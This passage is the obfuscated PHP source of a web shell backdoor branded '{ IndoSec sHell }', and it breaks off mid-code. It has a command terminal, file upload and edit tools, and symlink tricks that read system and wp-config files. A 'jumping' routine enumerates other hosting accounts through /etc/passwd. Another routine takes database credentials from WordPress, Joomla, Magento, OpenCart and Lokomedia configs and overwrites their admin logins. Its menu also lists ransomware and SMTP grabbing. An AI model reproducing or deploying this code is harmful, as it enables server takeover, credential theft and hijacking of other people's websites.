			\x9\x9<a href="?dir=" . $dir . "&aksi=symlink" class="fiture btn btn-danger btn-sm"><i class="fa fa-exclamation-circle"></i> Symlink</a>\xa	\x9	\x9	<a href="?dir=" . $dir . "&aksi=resetpasscp" class="fiture btn btn-warning btn-sm"><i class="fa fa-key"></i> Auto Reset Cpanel</a>\xa\x9\x9	\x9	<a href="?dir=" . $dir . "&aksi=auteduser" class="fiture btn btn-warning btn-sm"><i class="fas fa-user-edit"></i> Auto Edit User</a>\xa\x9\x9		\x9<a href="?dir=" . $dir . "&aksi=ransom" class="fiture btn btn-warning btn-sm"><i class="fab fa-keycdn"></i> Ransomware</a>\xa\x9	\x9	\x9<a href="?dir=" . $dir . "&aksi=smtpgrab" class="fiture btn btn-warning btn-sm"><i class="fas fa fa-exclamation-circle"></i> SMTP Grabber</a>
\x9			\x9<a href="?dir=" . $dir . "&aksi=bypascf" class="fiture btn btn-warning btn-sm"><i class="fas fa-cloud"></i> Bypass Cloud Flare</a>\xa\x9\x9\x9		<a href="?about" class="fiture btn btn-warning btn-sm"><i class="fa fa-info"></i> About Us</a>
	\x9			<a href="?keluar" class="fiture btn btn-warning btn-sm"><i class="fa fa-sign-out"></i> keluar</a>
	\x9\x9	</div>
	\x9	</div>\xa\x9\x9\x9<div class="row">\xa			\x9<div class="col-md-5"><br/>\xa	\x9	\x9	<h5><i class="fa fa-terminal"></i>Terminal : </h5>\xa\x9\x9\x9\x9	<form>\xa\x9	\x9			<input type="text" class="form-control" name="cmd" autocomplete="off" placeholder="id | uname -a | whoami | heked">
			\x9\x9</form>\xa\x9\x9\x9	\x9<hr style="backgroud: white"/>
	\x9\x9\x9\x9<h5><i class="fa fa-search"></i> Informasi : </h5>\xa\x9\x9\x9		<div class="card table-responsive">
\x9	\x9			<div class="card-body">\xa\x9\x9\x9		\x9\x9<table class="table" style="color: #333">
\x9\x9					\x9<tr>\xa					\x9\x9\x9\x9<td>PHP</td>\xa	\x9\x9\x9		\x9		<td> : " . $ver . "</td>\xa	\x9			\x9\x9\x9</tr>\xa	\x9	\x9	\x9		<tr>
					\x9			<td>IP Server</td>\xa\x9\x9		\x9	\x9\x9\x9<td> : " . $ip . "</td>
			\x9\x9			</tr>\xa				\x9			<tr>\xa\x9\x9	\x9\x9	\x9	\x9<td>HDD</td>
\x9\x9\x9\x9\x9\x9		\x9<td class="d-flex">Total : " . formatSize($total) . " Free : " . formatSize($free) . " [" . $pers . "%]</td>
	\x9\x9		\x9	\x9</tr>\xa\x9	\x9\x9	\x9	\x9<tr>
					\x9		\x9<td>Domain</td>\xa		\x9			\x9\x9\x9<td>: " . $dom . '' . $die . "</td>\xa		\x9			\x9	</tr>\xa		\x9\x9		\x9	<tr>\xa		\x9\x9\x9\x9			<td>MySQL</td>\xa	\x9	\x9	\x9\x9	\x9<td>: " . $mysql . "</td>
	\x9		\x9	\x9\x9</tr>\xa			\x9		\x9\x9<tr>\xa\x9			\x9\x9\x9\x9	<td>cURL</td>\xa			\x9\x9\x9			<td>: " . $curl . "</td>
\x9			\x9\x9	\x9</tr>\xa		\x9	\x9			<tr>
	\x9				\x9\x9	<td>Software</td>
\x9\x9			\x9		\x9<td>: " . $sof . "</td>
\x9	\x9			\x9	</tr>
			\x9				<tr>
	\x9\x9		\x9\x9\x9\x9<td>Sistem Operasi</td>\xa		\x9	\x9			\x9<td> : " . $os . "</td>\xa	\x9\x9	\x9\x9	\x9</tr>\xa\x9	\x9\x9\x9\x9\x9</table>
			\x9\x9\x9</div>
\x9\x9	\x9	</div><hr/>
		\x9\x9</div>\xa\x9\x9	<div class="col-md-7 mt-4">"; goto PMQDe; pbQJd: $mysql = function_exists("mysql_connect") ? "<font color=green>ON</font>" : "<font color=red>OFF</font>"; goto teBsd; PMQDe: if (isset($_GET["keluar"])) { session_start(); session_destroy(); echo "<script>window.location="?";</script>"; } goto bVW_6; Ok3YC: if (isset($_GET["file"])) { $file = $_GET["file"]; } goto OS6X6; PJRU9: function perms($file) { $perms = fileperms($file); if (($perms & 49152) == 49152) { $info = "s"; } elseif (($perms & 40960) == 40960) { $info = "l"; } elseif (($perms & 32768) == 32768) { $info = "-"; } elseif (($perms & 24576) == 24576) { $info = "b"; } elseif (($perms & 16384) == 16384) { $info = "d"; } elseif (($perms & 8192) == 8192) { $info = "c"; } elseif (($perms & 4096) == 4096) { $info = "p"; } else { $info = "u"; } $info .= $perms & 256 ? "r" : "-"; $info .= $perms & 128 ? "w" : "-"; $info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-"); $info .= $perms & 32 ? "r" : "-"; $info .= $perms & 16 ? "w" : "-"; $info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-"); $info .= $perms & 4 ? "r" : "-"; $info .= $perms & 2 ? "w" : "-"; $info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-"); return $info; } goto CTlYv; xn6PP: foreach ($scandir as $dir) { if (strlen($dir) > 18) { $_dir = substr($dir, 0, 18) . "..."; } else { $_dir = $dir; } $_diir = $_dir; if (!is_dir($path . "/" . $dir) || $dir == "." || $dir == "..") { continue; } echo "<tr>\xa\x9\x9\x9\x9	<td class="text-white"><img src="http://aux.iconspalace.com/uploads/folder-icon-256-1787672482.png" class="ico"></img> <a href="?dir=" . $path . "/" . $dir . "">" . $_diir . "</a></td>\xa\x9\x9\x9	\x9<td class="text-white text-center">"; echo "--"; echo "</td>
		\x9\x9	<td class="text-center">
\x9\x9			<a href="?dir=" . $path . "/" . $dir . "&aksi=chmod_dir">\xa"; if (is_writable($path . "/" . $dir)) { echo "<font color="#00ff00">"; } elseif (!is_readable($path . "/" . $dir)) { echo "<font color="red">"; } echo perms($path . "/" . $dir); if (is_writable($path . "/" . $dir) || !is_readable($path . "/" . $dir)) { echo "</font></a></td>
		\x9\x9\x9<td class=""><center><a title="Rename" class="badge badge-success" href="?dir=" . $path . "/" . $dir . "&aksi=rename_folder">&nbsp;<i class="fas fa-pen"></i>&nbsp;</a>&nbsp;&nbsp;<a title="Delete" class="badge badge-danger" href="?dir=" . $path . "/" . $dir . "&aksi=hapus_folder">&nbsp;<i class="fa fa-trash"></i>&nbsp;</a>
			\x9\x9</td>"; } } goto n0tKq; c53nV: @ini_set("log_errors", 0); goto ny8eb; OS6X6: if ($_GET["aksi"] == "buat_file") { echo "\xa	\x9\x9<h4>\xa	\x9\x9\x9<img src='http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png' class='ico2'></img> Buat File: 
	\x9	</h4>\xa\x9		<form method='POST'>\xa\x9\x9\x9\x9<input type='text' class='form-control' name='nama_file' autocomplete='off' placeholder='Nama File...'><br/>
		\x9	<textarea name='isi_file' class='form-control' rows='8' placeholder='Isi File...'></textarea><br/>
	\x9		<button type='sumbit' class='btn btn-info btn-block' name='bikin'>Bikin!!</button>
\x9		</form>"; if (isset($_POST["bikin"])) { $nama_file = $_POST["nama_file"]; $isi_file = $_POST["isi_file"]; $handle = fopen("{$nama_file}", "w"); if (fwrite($handle, $isi_file)) { echo "<script>window.location="?dir=" . $dir . ""; alert("Buat File Berhasil");</script>"; } else { echo "<script>alert("File Gagal Dibuat");</script>"; } } } goto B7fRz; jAcCG: $default_charset = "UTF-8"; goto rBdID; LB30f: session_start(); goto u7SA4; XhlRY: @ini_set("output_buffering", 0); goto teeib; ob6mM: $total = disk_total_space($path); goto vGSQa; vPQRS: if (isset($_GET["file"]) && $_GET["file"] != '' && $_GET["aksi"] == "download") { @ob_clean(); $file = $_GET["file"]; header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename="" . basename($file) . """); header("Expires: 0"); header("Cache-Control: must-revalidate"); header("Pragma: public"); header("Content-Length: " . filesize($file)); readfile($file); die; } goto s0lZA; rqHo2: if (isset($_GET["about"])) { echo "<div class="card text-center bg-light about">
		\x9	<h4 class="card-header">{ IndoSec }</h4>\xa\x9			<div class="card-body">
\x9	\x9		<center><div class="img"></div></center>\xa	\x9\x9\x9	<p class="card-text">{ IndoSec } Adalah Sebuah Komunitas Yang Berfokus Kepada Teknologi Di Indonesia, Dari Membuat Mengamankan Dan Mengexploitasi Sebuah Sistem.</p>
				</div>\xa\x9\x9\x9\x9<div class="card-footer">
	\x9	\x9\x9<p class="card-text"><small class="text-muted">Copyright 2019 { IndoSec }</small></p>\xa				</div>\xa\x9\x9\x9</div><br/>"; die; } goto xQnAH; teeib: @ini_set("display_errors", 0); goto OSshl; fl2dV: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "<a href="?dir=/">/</a>"; continue; } if ($pat == '') { continue; } echo "<a href="?dir="; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "/"; } } echo "">" . $pat . "</a>/"; } goto WWyxv; oAS2R: set_time_limit(0); goto vk5Bh; OSshl: $aupas = "453f58de9b549b8aaa53db7c49c8c3c8"; goto sUlgs; WWyxv: $scandir = scandir($path); goto KPY1y; gUTTf: echo "Path : "; goto fl2dV; QpB05: if ($_GET["aksi"] == "symread") { echo "read /etc/named.conf"; echo "<form method='post' action='?dir={$dir}&aksi=symread&save=1'>\xa\x9\x9	<textarea class='form-control' rows='8' name='file'>"; flush(); flush(); $file = "/etc/named.conf"; $r3ad = @fopen($file, "r"); if ($r3ad) { $content = @fread($r3ad, @filesize($file)); echo '' . htmlentities($content) . ''; } else { if (!$r3ad) { $r3ad = @show_source($file); } else { if (!$r3ad) { $r3ad = @highlight_file($file); } else { if (!$r3ad) { $sm = @symlink($file, "sym.txt"); if ($sm) { $r3ad = @fopen("sym/sym.txt", "r"); $content = @fread($r3ad, @filesize($file)); echo '' . htmlentities($content) . ''; } } } } } echo "</textarea><br/><input type='submit' class='btn btn-danger form-control' value='Save'/> </form>"; if (isset($_GET["save"])) { $cont = stripcslashes($_POST["file"]); $f = fopen("named.txt", "w"); $w = fwrite($f, $cont); if ($w) { echo "<br/>save has been successfully"; } fclose($f); } die; } goto DSqrx; h2GTS: $path = str_replace("\", "/", $path); goto VE56d; rBdID: function login_shell() { ?> 
<!doctypehtml><html><head><meta content="widht=device-widht,initial-scale=1"name="viewport"><meta content="Holiq"name="author"><meta content="{ IndoSec }"name="copyright"><title>{ IndoSec sHell }</title><link href="https://www.indsc.me/images/logo.png"rel="icon"type="image/png"><link href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"rel="stylesheet"><link href="https://use.fontawesome.com/releases/v5.7.1/css/all.css"rel="stylesheet"></head><body class="text-center bg-dark text-light"><div class="container mt-5"><div class="form-group"><h1 class="text-center">{ INDOSEC }</h1><h5 class="text-center pb-5">Shell Backdoor</h5><form method="post"><input class="form-control"type="password"name="pass"placeholder="USER ID"><br><input class="btn btn-block btn-danger"class="form-control"type="submit"value="Login"></form></div></div><a class="fixed-bottom mb-3 text-muted"href="https://facebook.com/IndoSecOfficial">Copyright 2019 @ { IndoSec }</a></body></html><?php  die; } goto zyt1z; s0lZA: function w($dir, $perm) { if (!is_writable($dir)) { return "<font color=red>" . $perm . "</font>"; } else { return "<font color=lime>" . $perm . "</font>"; } } goto rqWOj; VY1ts: @ini_set("error_log", NULL); goto c53nV; DSqrx: if ($_GET["aksi"] == "sym_404") { echo "<h2>Symlink 404</h2>
\x9\x9<form method="post">
			File Target: <input type="text" class="form-control" name="dir" value="/home/user/public_html/wp-config.php"><br>\xa\x9\x9	Save As: <input type="text" class="form-control" name="isi" placeholder="[Ex] file.txt"/><br/>
\x9	\x9<input type="submit" class="btn btn-danger btn-block" value="Execute" name="execute"/>
	\x9</form>"; if ($_POST["execute"]) { rmdir("indosec_sym404"); mkdir("indosec_sym404", 511); $dir = $_POST["dir"]; $isi = $_POST["isi"]; system("ln -s " . $dir . "indosec_sym404/" . $isi); symlink($dir, "indosec_sym404/" . $isi); $inija = fopen("indosec_sym404/.htaccess", "w"); fwrite($inija, "ReadmeName " . $isi . "\xaOptions Indexes FollowSymLinks
DirectoryIndex ids.html
AddType text/plain .php
AddHandler text/plain .php\xaSatisfy Any"); echo "<a href="/indosec_sym404/" target="_blank"> >>Sukses<< </a>"; } die; } goto PoD22; k1N0A: $os = php_uname(); goto vYk78; CTlYv: if (isset($_GET["path"])) { $path = $_GET["path"]; chdir($path); } else { $path = getcwd(); } goto h2GTS; L24e8: if ($_GET["aksi"] == "upload") { echo "<form method="POST" enctype="multipart/form-data" name="uploader" id="uploader">\xa	\x9\x9\x9<div class="card mt-4">
	\x9\x9		<div class="card-body form-group">\xa			\x9\x9	<p class="text-muted">//Multiple Upload</p>\xa\x9		\x9		<div class="custom-file">
	\x9	\x9	\x9\x9<input type="file" name="file[]" multiple class="custom-file-input" id="customFile">\xa	\x9	\x9\x9		<label class="custom-file-label" for="customFile">Choose file</label>
\x9				\x9</div>\xa\x9\x9\x9	\x9\x9<input type="submit" class="btn btn-sm btn-primary btn-block mt-4 p-2" name="upload" value="Upload">\xa	\x9\x9\x9	</div>\xa	\x9		</div>\xa\x9\x9	</form>"; if (isset($_POST["upload"])) { $jumlah = count($_FILES["file"]["name"]); for ($i = 0; $i < $jumlah; $i++) { $filename = $_FILES["file"]["name"][$i]; $up = @copy($_FILES["file"]["tmp_name"][$i], "{$dir}/" . $filename); } if ($jumlah < 2) { if ($up) { echo "<script>alert("Berhasil Upload " . $filename . "");</script>"; } else { echo "<script>alert("Gagal Upload!!!");</script>"; } } else { echo "<script>alert("Berhasil Upload " . $jumlah . " File");</script>"; } } } goto Ok3YC; rqWOj: function r($dir, $perm) { if (!is_readable($dir)) { return "<font color=red>" . $perm . "</font>"; } else { return "<font color=lime>" . $perm . "</font>"; } } goto VIISu; gmIGR: $path = str_replace("\", "/", $path); goto Fa07H; Fa07H: $paths = explode("/", $path); goto gUTTf; fnGp0: if ($_GET["aksi"] == "jumping") { $i = 0; echo "<div class='card container'>"; if (preg_match("/hsphere/", $dir)) { $urls = explode("
", $_POST["url"]); if (isset($_POST["jump"])) { echo "<pre>"; foreach ($urls as $url) { $url = str_replace(array("http://", "www."), '', strtolower($url)); $etc = "/etc/passwd"; $f = fopen($etc, "r"); while ($gets = fgets($f)) { $pecah = explode(":", $gets); $user = $pecah[0]; $dir_user = "/hsphere/local/home/{$user}"; if (is_dir($dir_user) === true) { $url_user = $dir_user . "/" . $url; if (is_readable($url_user)) { $i++; $jrw = "[<font color=green>R</font>] <a href='?dir={$url_user}'><font color=#0046FF>{$url_user}</font></a>"; if (is_writable($url_user)) { $jrw = "[<font color=green>RW</font>] <a href='?dir={$url_user}'><font color=#0046FF>{$url_user}</font></a>"; } echo $jrw . "<br>"; } } } } if ($i == 0) { } else { echo "<br>Total ada " . $i . " Kamar di " . $ip; } echo "</pre>"; } else { echo "<center>
\x9\x9	\x9\x9  <form method="post">
					  List Domains: <br>
\x9\x9	\x9	  <textarea name="url" class="form-control">"; $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt", "r"); while ($getss = fgets($fp)) { echo $getss; } echo "</textarea><br>
\x9\x9\x9	\x9  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
		\x9\x9\x9  </form></center>"; } } elseif (preg_match("/vhosts/", $dir)) { $urls = explode("\xd\xa", $_POST["url"]); if (isset($_POST["jump"])) { echo "<pre>"; foreach ($urls as $url) { $web_vh = "/var/www/vhosts/{$url}/httpdocs"; if (is_dir($web_vh) === true) { if (is_readable($web_vh)) { $i++; $jrw = "[<font color=green>R</font>] <a href='?dir={$web_vh}'><font color=#0046FF>{$web_vh}</font></a>"; if (is_writable($web_vh)) { $jrw = "[<font color=green>RW</font>] <a href='?dir={$web_vh}'><font color=#0046FF>{$web_vh}</font></a>"; } echo $jrw . "<br>"; } } } if ($i == 0) { } else { echo "<br>Total ada " . $i . " Kamar di " . $ip; } echo "</pre>"; } else { echo "<center>\xa		\x9\x9	  <form method="post">
\x9\x9\x9\x9	  List Domains: <br>\xa			\x9	  <textarea name="url" class="form-control">"; bing("ip:{$ip}"); echo "</textarea><br>\xa\x9	\x9	\x9  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">\xa\xa\x9	\x9	\x9  </form></center>"; } } else { echo "<pre>"; $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font><br/>"); while ($passwd = fgets($etc)) { if ($passwd == '' || !$etc) { echo "<font color=red>Can't read /etc/passwd</font><br/>"; } else { preg_match_all("/(.*?):x:/", $passwd, $user_jumping); foreach ($user_jumping[1] as $user_pro_jump) { $user_jumping_dir = "/home/{$user_pro_jump}/public_html"; if (is_readable($user_jumping_dir)) { $i++; $jrw = "[<font color=green>R</font>] <a href='?dir={$user_jumping_dir}'><font color=#0046FF>{$user_jumping_dir}</font></a>"; if (is_writable($user_jumping_dir)) { $jrw = "[<font color=green>RW</font>] <a href='?dir={$user_jumping_dir}'><font color=#0046FF>{$user_jumping_dir}</font></a>"; } echo $jrw; if (function_exists("posix_getpwuid")) { $domain_jump = file_get_contents("/etc/named.conf"); if ($domain_jump == '') { echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); foreach ($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/{$dj}")); $user_jumping_url = $user_jumping_url["name"]; if ($user_jumping_url == $user_pro_jump) { echo " => ( <u>{$dj}</u> )<br>"; break; } } } } else { echo "<br>"; } } } } } if ($i == 0) { } else { echo "<br>Total ada " . $i . " Kamar di " . $ip; } echo "</pre>"; } echo "</div><br/>"; die; } goto kcGCA; tnc1N: echo "<a href='#' class='scrollToTop'><i class='fa fa-arrow-up up' aria-hidden='true'></i></a>"; goto HR7MM; DgzH7: ?> 
<html><head><meta content="widht=device-widht,initial-scale=1"name="viewport"><meta content="Holiq"name="author"><meta content="{ IndoSec }"name="copyright"><link href="https://www.indsc.me/images/logo.png"rel="icon"type="image/png"><title>{ IndoSec sHell }</title><link href="pojan/assets/css/bootstrap.min.css"rel="stylesheet"><link href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"rel="stylesheet"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.2/css/all.min.css"rel="stylesheet"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"rel="stylesheet"><script src="https://code.jquery.com/jquery-3.3.1.js"></script><script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script></head><body class="bg-dark text-light"><script>$(document).ready(function(){ 
				$(window).scroll(function(){ 
					if ($(this).scrollTop() > 700) { 
						$(".scrollToTop").fadeIn(); 
					}else{ 
						$(".scrollToTop").fadeOut(); 
					} 
				}); 
				$(".scrollToTop").click(function(){ 
					$("html, body").animate({scrollTop : 0},1000); 
					return false; 
				}); 
			}); 
			$(document).ready(function() { 
				$('input[type="file"]').on("change", function() { 
					let filenames = []; 
					let files = document.getElementById("customFile").files; 
					if (files.length > 1) { 
						filenames.push("Total Files (" + files.length + ")"); 
					} else { 
						for (let i in files) { 
							if (files.hasOwnProperty(i)) { 
								filenames.push(files[i].name); 
							} 
						} 
					} 
					$(this).next(".custom-file-label").html(filenames.join(",")); 
				}); 
			});</script><style>@import url(https://fonts.googleapis.com/css?family=Lato);@import url(https://fonts.googleapis.com/css?family=Quicksand);@import url(https://fonts.googleapis.com/css?family=Inconsolata);input[type=text],textarea{font-family:Inconsolata,monospace}body{margin:0;padding:0;font-family:Lato}#tab table thead th{padding:5px;font-size:16px}#tab tr{border-bottom:1px solid #fff}#tab tr:hover{background:#5b6f7d;color:#fff}#tab tr td{padding:5px}#tab tr td .badge{font-size:13px}#tab a{color:#fff}.active,.active:hover{color:#0f0}a{font-family:Quicksand;color:#fff}a:hover{color:#1e90ff}.badge{width:30px}.badge:hover{transform:scale(1.1);transition:all.3;cursor:pointer}.ico{width:25px}.ico2{width:30px}.scrollToTop{position:fixed;bottom:30px;right:30px;width:35px;height:35px;background:#262626;color:#fff;border-radius:15%;text-align:center;opacity:.5}.scrollToTop:hover{color:#fff}.up{font-size:25px;line-height:35px}.lain{color:#888;font-size:20px;margin-left:5px;top:1px}.lain:hover{color:#fff}.tambah{width:35px;height:35px;line-height:35px;border:1px solid;border-radius:50%;text-align:center}.fiture{margin:3px}.tmp th{font-size:14px}.tmp tr td{border:solid 1px #bbb;text-align:center;font-size:13px;padding:2px 5px}.tmp tr:hover{background:#5b6f7d;color:#fff}.about{color:#000}.about .card-body .img{position:relative;background:url(https://i.postimg.cc/Wb1X4xNS/image.png);background-size:cover;width:150px;height:150px}.butn{position:relative;text-align:center;padding:3px;background:rgba(225,225,225,.3);-webkit-transition:background .3s ease,color .3s ease;transition:background .3s ease,color .3s ease}input[type=radio].toggle{display:none}input[type=radio].toggle+label{cursor:pointer;margin:0 2px;width:60px}input[type=radio].toggle+label:after{position:absolute;content:"";top:0;background:#fff;height:100%;width:100%;z-index:-1;-webkit-transition:left .4s cubic-bezier(.77,0,.175,1);transition:left .4s cubic-bezier(.77,0,.175,1)}input[type=radio].toggle.toggle-left+label:after{left:100%}input[type=radio].toggle.toggle-right+label{margin-left:-5px}input[type=radio].toggle.toggle-right+label:after{left:-100%}input[type=radio].toggle:checked+label{cursor:default;color:#000;-webkit-transition:color .4s;transition:color .4s}input[type=radio].toggle:checked+label:after{left:0}</style><nav class="navbar navbar-dark static-top"><button aria-label="Toggle navigation"class="navbar-toggler"data-target="#info"data-toggle="collapse"type="button"><i class="fa fa-navicon"style="color:#fff"></i></button><div class="collapse navbar-collapse"id="info"><ul><a class="lain"href="https://facebook.com/IndoSecOfficial"><i class="fa tambah fa-facebook"></i></a> <a class="lain"href="https://www.instagram.com/indosec.id"><i class="fa tambah fa-instagram"></i></a> <a class="lain"href="https://www.youtube.com/IndoSec"><i class="fa tambah fa-youtube-play"></i></a> <a class="lain"href="https://github.com/indosecid"><i class="fa tambah fa-github"></i></a> <a class="lain"href="https://indosec.web.id"><i class="fa tambah fa-globe"></i></a></ul></div></nav><?php  goto zsyBf; y7fjP: echo "</table></div><hr/>\xa\x9	<center><a class="text-muted" href="https://facebook.com/IndoSecOfficial">Copyright 2019 { IndoSec }</a></center><br/>"; goto tnc1N; VpdbN: if ($_GET["aksi"] == "auteduser") { if ($_POST["hajar"]) { if (strlen($_POST["pass_baru"]) < 6 or strlen($_POST["user_baru"]) < 6) { echo "Username dan Password harus lebih dari 6 karakter"; } else { $user_baru = $_POST["user_baru"]; $pass_baru = md5($_POST["pass_baru"]); $conf = $_POST["config_dir"]; $scan_conf = scandir($conf); foreach ($scan_conf as $file_conf) { if (!is_file("{$conf}/{$file_conf}")) { continue; } $config = file_get_contents("{$conf}/{$file_conf}"); if (preg_match("/JConfig|joomla/", $config)) { $dbhost = ambilkata($config, "host = '", "'"); $dbuser = ambilkata($config, "user = '", "'"); $dbpass = ambilkata($config, "password = '", "'"); $dbname = ambilkata($config, "db = '", "'"); $dbprefix = ambilkata($config, "dbprefix = '", "'"); $prefix = $dbprefix . "users"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM {$prefix} ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result["id"]; $site = ambilkata($config, "sitename = '", "'"); $update = mysql_query("UPDATE {$prefix} SET username='{$user_baru}',password='{$pass_baru}' WHERE id='{$id}'"); echo "Config => " . $file_conf . "<br>"; echo "CMS => Joomla<br>"; if ($site == '') { echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>"; } else { echo "Sitename => {$site}<br>"; } if (!$update or !$conn or !$db) { echo "Status => <font color=red>" . mysql_error() . "</font><br><br>"; } else { echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>"; } mysql_close($conn); } elseif (preg_match("/WordPress/", $config)) { $dbhost = ambilkata($config, "DB_HOST', '", "'"); $dbuser = ambilkata($config, "DB_USER', '", "'"); $dbpass = ambilkata($config, "DB_PASSWORD', '", "'"); $dbname = ambilkata($config, "DB_NAME', '", "'"); $dbprefix = ambilkata($config, "table_prefix  = '", "'"); $prefix = $dbprefix . "users"; $option = $dbprefix . "options"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM {$prefix} ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM {$option} ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if ($target == '') { $url_target = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>"; } else { $url_target = "Login => <a href='{$target}/wp-login.php' target='_blank'><u>{$target}/wp-login.php</u></a><br>"; } $update = mysql_query("UPDATE {$prefix} SET user_login='{$user_baru}',user_pass='{$pass_baru}' WHERE id='{$id}'"); echo "Config => " . $file_conf . "<br>"; echo "CMS => Wordpress<br>"; echo $url_target; if (!$update or !$conn or !$db) { echo "Status => <font color=red>" . mysql_error() . "</font><br><br>"; } else { echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>"; } mysql_close($conn); } elseif (preg_match("/Magento|Mage_Core/", $config)) { $dbhost = ambilkata($config, "<host><![CDATA[", "]]></host>"); $dbuser = ambilkata($config, "<username><![CDATA[", "]]></username>"); $dbpass = ambilkata($config, "<password><![CDATA[", "]]></password>"); $dbname = ambilkata($config, "<dbname><![CDATA[", "]]></dbname>"); $dbprefix = ambilkata($config, "<table_prefix><![CDATA[", "]]></table_prefix>"); $prefix = $dbprefix . "admin_user"; $option = $dbprefix . "core_config_data"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM {$prefix} ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $q2 = mysql_query("SELECT * FROM {$option} WHERE path='web/secure/base_url'"); $result2 = mysql_fetch_array($q2); $target = $result2[value]; if ($target == '') { $url_target = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>"; } else { $url_target = "Login => <a href='{$target}/admin/' target='_blank'><u>{$target}/admin/</u></a><br>"; } $update = mysql_query("UPDATE {$prefix} SET username='{$user_baru}',password='{$pass_baru}' WHERE user_id='{$id}'"); echo "Config => " . $file_conf . "<br>"; echo "CMS => Magento<br>"; echo $url_target; if (!$update or !$conn or !$db) { echo "Status => <font color=red>" . mysql_error() . "</font><br><br>"; } else { echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>"; } mysql_close($conn); } elseif (preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $config)) { $dbhost = ambilkata($config, "'DB_HOSTNAME', '", "'"); $dbuser = ambilkata($config, "'DB_USERNAME', '", "'"); $dbpass = ambilkata($config, "'DB_PASSWORD', '", "'"); $dbname = ambilkata($config, "'DB_DATABASE', '", "'"); $dbprefix = ambilkata($config, "'DB_PREFIX', '", "'"); $prefix = $dbprefix . "user"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM {$prefix} ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = ambilkata($config, "HTTP_SERVER', '", "'"); if ($target == '') { $url_target = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>"; } else { $url_target = "Login => <a href='{$target}' target='_blank'><u>{$target}</u></a><br>"; } $update = mysql_query("UPDATE {$prefix} SET username='{$user_baru}',password='{$pass_baru}' WHERE user_id='{$id}'"); echo "Config => " . $file_conf . "<br>"; echo "CMS => OpenCart<br>"; echo $url_target; if (!$update or !$conn or !$db) { echo "Status => <font color=red>" . mysql_error() . "</font><br><br>"; } else { echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>"; } mysql_close($conn); } elseif (preg_match("/panggil fungsi validasi xss dan injection/", $config)) { $dbhost = ambilkata($config, "server = "", """); $dbuser = ambilkata($config, "username = "", """); $dbpass = ambilkata($config, "password = "", """); $dbname = ambilkata($config, "database = "", """); $prefix = "users"; $option = "identitas"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM {$option} ORDER BY id_identitas ASC"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if ($target == '') { $target2 = $result[url]; $url_target = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>"; if ($target2 == '') { $url_target2 = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>"; } else { $cek_login3 = file_get_contents("{$target2}/adminweb/"); $cek_login4 = file_get_contents("{$target2}/lokomedia/adminweb/"); if (preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { $url_target2 = "Login => <a href='{$target2}/adminweb' target='_blank'><u>{$target2}/adminweb</u></a><br>"; } elseif (preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { $url_target2 = "Login => <a href='{$target2}/lokomedia/adminweb' target='_blank'><u>{$target2}/lokomedia/adminweb</u></a><br>"; } else { $url_target2 = "Login => <a href='{$target2}' target='_blank'><u>{$target2}</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>"; } } } else { $cek_login = file_get_contents("{$target}/adminweb/"); $cek_login2 = file_get_contents("{$target}/lokomedia/adminweb/"); if (preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { $url_target = "Login => <a href='{$target}/adminweb' target='_blank'><u>{$target}/adminweb</u></a><br>"; } elseif (preg_match("/CMS 